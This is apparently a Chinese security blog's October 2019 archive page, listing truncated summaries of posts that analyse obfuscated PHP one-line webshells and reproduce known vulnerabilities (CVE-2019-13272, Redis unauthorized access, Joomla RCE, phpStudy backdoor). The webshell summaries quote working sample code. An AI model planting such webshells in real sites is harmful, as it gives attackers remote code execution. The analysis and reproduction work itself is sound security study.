10 2019 档案

摘要:WebShell代码分析溯源(四) 一、一句话变形马样本 <?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").(" 阅读全文
posted @ 2019-10-31 12:49 雨中落叶 阅读(859) 评论(0) 推荐(0) 编辑
摘要:WebShell代码分析溯源(三) 一、一句话变形马样本 <?php $g = array('','s');$gg = a.$g[1].ser.chr('116');@$gg($_POST[get]);?> 二、代码分析 1、调整代码格式 2、分析代码 分析代码,首先创建一个g数组,然后拼接字符串, 阅读全文
posted @ 2019-10-30 13:54 雨中落叶 阅读(624) 评论(0) 推荐(0) 编辑
摘要:WebShell代码分析溯源(二) 一、一句话变形马样本 <?php $POST['POST']='assert';$array[]=$POST;$array[0]['POST']($_POST['assert']);?> 二、代码分析 1、调整代码格式 2、分析代码,首先先把”assert”字符串 阅读全文
posted @ 2019-10-30 12:35 雨中落叶 阅读(595) 评论(0) 推荐(0) 编辑
摘要:WebShell代码分析溯源(一) 一、一句话变形马样本 <?php $_GET['POST']($_POST['GET']);?> 二、代码分析 1、调整代码格式 <?php $_GET['POST']($_POST['GET']); ?> 2、分析代码,首先以GET方法接收url中POST参数传 阅读全文
posted @ 2019-10-29 14:10 雨中落叶 阅读(1722) 评论(0) 推荐(0) 编辑
摘要:Linux本地内核提权漏洞复现(CVE-2019-13272) 一、漏洞描述 当调用PTRACE_TRACEME时,ptrace_link函数将获得对父进程凭据的RCU引用,然后将该指针指向get_cred函数。但是,对象struct cred的生存周期规则不允许无条件地将RCU引用转换为稳定引用。 阅读全文
posted @ 2019-10-28 12:43 雨中落叶 阅读(4540) 评论(0) 推荐(0) 编辑
摘要:Redis未授权访问漏洞复现 一、漏洞描述 Redis默认情况下,会绑定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没有配置密码访问时都会报错),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问 阅读全文
posted @ 2019-10-14 12:44 雨中落叶 阅读(18289) 评论(0) 推荐(5) 编辑
摘要:Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现 一、漏洞描述 Joomla是一套内容管理系统,是使用PHP语言加上MYSQL数据库所开发的软件系统,最新版本为3.9.12,官网: https://downloads.joomla.org/,漏洞位于根目录下的configurat 阅读全文
posted @ 2019-10-12 23:24 雨中落叶 阅读(9388) 评论(0) 推荐(0) 编辑
摘要:phpStudy后门漏洞利用复现 一、漏洞描述 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer 多款软件一次性安装,无需配置即可直接安装使用,具有PHP环境调试和PHP开发功能,在国内有着近 阅读全文
posted @ 2019-10-01 15:17 雨中落叶 阅读(8890) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示